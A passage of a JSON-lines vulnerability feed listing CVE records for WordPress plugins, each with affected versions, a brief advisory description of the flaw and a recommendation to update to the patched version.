version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e498706-3dbe-4c48-9c0d-0d90677aba0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e498706-3dbe-4c48-9c0d-0d90677aba0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-up\\\/tags\\\/2.20.1\\\/view\\\/giftup-checkout.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989802\\\/gift-up#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989802\\\/gift-up#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12589","slug":"finale-woocommerce-sales-countdown-timer-discount","versionImpact":"2.19.0","versionEndExcluding":"2.20.0","description":"The Finale Lite \u2013 Sales Countdown Timer & Discount for WooCommerce plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via the countdown timer in all versions up to, and including, 2.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247611\\\/finale-woocommerce-sales-countdown-timer-discount\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247611\\\/finale-woocommerce-sales-countdown-timer-discount\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae0a001b-0792-4a32-8f49-5d4b1550f4be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae0a001b-0792-4a32-8f49-5d4b1550f4be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10860","slug":"woo-thank-you-page-nextmove-lite","versionImpact":"2.19.0","versionEndExcluding":"2.20.0","description":"The NextMove Lite \u2013 Thank You Page for WooCommerce plugin for WordPress is vulnerable to unauthorized submission of data due to a missing capability check on the _submit_uninstall_reason_action() function in all versions up to, and including, 2.19.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason on behalf of a site.","recommendation":"Update to version 2.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246927\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246927\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cefecf8-46dc-4ae1-9e94-b724beb7136f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cefecf8-46dc-4ae1-9e94-b724beb7136f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9645","slug":"post-grid","versionImpact":"2.2.92","versionEndExcluding":"2.2.93","description":"The Post Grid, Posts Slider, Posts Carousel, Post Filter, Post Masonry WordPress plugin before 2.2.93 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.2.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfd6db83-5e7f-4631-87c3-fdcd4c64c4fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfd6db83-5e7f-4631-87c3-fdcd4c64c4fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8253","slug":"post-grid","versionImpact":"2.2.90","versionEndExcluding":"2.2.91","description":"The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in all versions 2.2.87 to 2.2.90. This is due to the plugin not properly restricting what user meta values can be updated and ensuring a form is active. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta to become an administrator.","recommendation":"Update to version 2.2.91, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3032\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130155\\\/post-grid\\\/tags\\\/2.2.87\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130155\\\/post-grid\\\/tags\\\/2.2.87\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146752\\\/post-grid\\\/tags\\\/2.2.91\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146752\\\/post-grid\\\/tags\\\/2.2.91\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10149","slug":"instagram-slider-widget","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Social Slider Feed WordPress plugin before 2.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1619dc4b-4e5e-4b82-820b-3c4e732db3ad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1619dc4b-4e5e-4b82-820b-3c4e732db3ad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11351","slug":"restricted-content","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Restrict \u2013 membership, site, content and user access restrictions for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.8 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201494\\\/restricted-content\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201494\\\/restricted-content\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de982653-26b4-4a7b-a391-373362bcb834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de982653-26b4-4a7b-a391-373362bcb834?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45803","slug":"forms-gutenberg","versionImpact":"2.2.8.3","versionEndExcluding":"2.2.9","description":"Missing Authorization vulnerability in Nikolay Strikhar WordPress Form Builder Plugin \u2013 Gutenberg Forms.This issue affects WordPress Form Builder Plugin \u2013 Gutenberg Forms: from n\/a through 2.2.8.3.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-gutenberg\\\/wordpress-gutenberg-forms-plugin-2-2-8-3-auth-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-gutenberg\\\/wordpress-gutenberg-forms-plugin-2-2-8-3-auth-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6586","slug":"download-plugin","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Download Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the dpwap_plugin_locInstall function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/tags\\\/2.2.8\\\/app\\\/Plugins\\\/Dpwapuploader.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/tags\\\/2.2.8\\\/app\\\/Plugins\\\/Dpwapuploader.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37734c25-cce3-41fb-babf-714ba7a4bced?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37734c25-cce3-41fb-babf-714ba7a4bced?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5664","slug":"garden-gnome-package","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Garden Gnome Package plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ggpkg' shortcode in all versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was partially patched in version 2.2.7 and fully patched in version 2.2.9.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c7385c7-47de-4511-b474-7415c3977aa8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c7385c7-47de-4511-b474-7415c3977aa8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.5\\\/include\\\/ggpackage.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.5\\\/include\\\/ggpackage.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987987\\\/garden-gnome-package#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987987\\\/garden-gnome-package#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988944\\\/garden-gnome-package#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988944\\\/garden-gnome-package#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5531","slug":"ocean-extra","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Flickr widget in all versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b39e17c5-711f-4229-90f4-213ea65a190d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b39e17c5-711f-4229-90f4-213ea65a190d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.2.8\\\/includes\\\/widgets\\\/flickr.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.2.8\\\/includes\\\/widgets\\\/flickr.php#L59\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13873","slug":"wp-job-portal","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.8 via the deleteUserPhoto() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove profile photos from users accounts. Please note that this does not officially delete the file.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242653\\\/wp-job-portal\\\/tags\\\/2.2.9\\\/includes\\\/classes\\\/uploads.php?old=3238353&old_path=wp-job-portal%2Ftags%2F2.2.8%2Fincludes%2Fclasses%2Fuploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242653\\\/wp-job-portal\\\/tags\\\/2.2.9\\\/includes\\\/classes\\\/uploads.php?old=3238353&old_path=wp-job-portal%2Ftags%2F2.2.8%2Fincludes%2Fclasses%2Fuploads.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba3c5-382e-4d2b-83d8-0e0cebf2e63c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba3c5-382e-4d2b-83d8-0e0cebf2e63c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7588","slug":"post-grid","versionImpact":"2.2.84","versionEndExcluding":"2.2.88","description":"The Gutenberg Blocks, Page Builder \u2013 ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion block in all versions up to, and including, 2.2.87 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.88, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/248a9cb2-24e8-46b2-9ef8-23a8444a922d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/248a9cb2-24e8-46b2-9ef8-23a8444a922d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133880\\\/post-grid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133880\\\/post-grid\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6346","slug":"post-grid","versionImpact":"2.2.85","versionEndExcluding":"2.2.86","description":"The Gutenberg Blocks, Page Builder \u2013 ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the redirectURL parameter of the Date Countdown widget, in all versions up to, and including, 2.2.85a due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.86, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1512d911-167f-4653-ab20-cb057b83dab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1512d911-167f-4653-ab20-cb057b83dab1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/front-scripts.js#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/front-scripts.js#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/index.php#L283\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/index.php#L283\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9511","slug":"fluent-smtp","versionImpact":"2.2.82","versionEndExcluding":"2.2.83","description":"The FluentSMTP \u2013 WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.2.82 via deserialization of untrusted input in the 'formatResult' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. The vulnerability was partially patched in version 2.2.82.","recommendation":"Update to version 2.2.83, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194359\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194359\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194555\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194555\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3deedc4-b939-4c54-8376-95d3728872d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3deedc4-b939-4c54-8376-95d3728872d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3155","slug":"post-grid","versionImpact":"2.2.80","versionEndExcluding":"2.2.81","description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel \u2013 Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84bc611c-c38a-4282-9a9b-5bb9157fb1de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84bc611c-c38a-4282-9a9b-5bb9157fb1de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084503%40post-grid%2Ftrunk&old=3078364%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084503%40post-grid%2Ftrunk&old=3078364%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1988","slug":"post-grid","versionImpact":"2.2.80","versionEndExcluding":"2.2.81","description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel \u2013 Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute in blocks in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49da9e7-26a1-442b-b5d0-1da3bcf0e8c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49da9e7-26a1-442b-b5d0-1da3bcf0e8c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/accordion-nested-item\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/accordion-nested-item\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4042","slug":"post-grid","versionImpact":"2.2.80","versionEndExcluding":"2.2.81","description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel \u2013 Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute of the menu-wrap-item block in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e6eb58-79e2-4404-887a-0392ce7914aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e6eb58-79e2-4404-887a-0392ce7914aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/menu-wrap-item\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/menu-wrap-item\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6565","slug":"aforms-form-builder-for-price-calculator-cost-estimation","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The AForms \u2014 Form Builder for Price Calculator & Cost Estimation plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.6. This is due to the plugin utilizing the aura library and allowing direct access to the phpunit test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702261eb-4f85-4388-9f82-75476640e8ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702261eb-4f85-4388-9f82-75476640e8ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-form-builder-for-price-calculator-cost-estimation\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-form-builder-for-price-calculator-cost-estimation\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&new=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&new=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13429","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the 'jobenforcedelete' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with employer-level access and above, to delete arbitrary","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/job\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjob%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/job\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjob%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cbce69a-53d0-4b83-9b7a-893a6b9c39c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cbce69a-53d0-4b83-9b7a-893a6b9c39c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13428","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the deleteCompanyLogo() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to delete arbitrary company logos.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c786fe-898e-4478-97b9-c1fb41c9081c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c786fe-898e-4478-97b9-c1fb41c9081c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
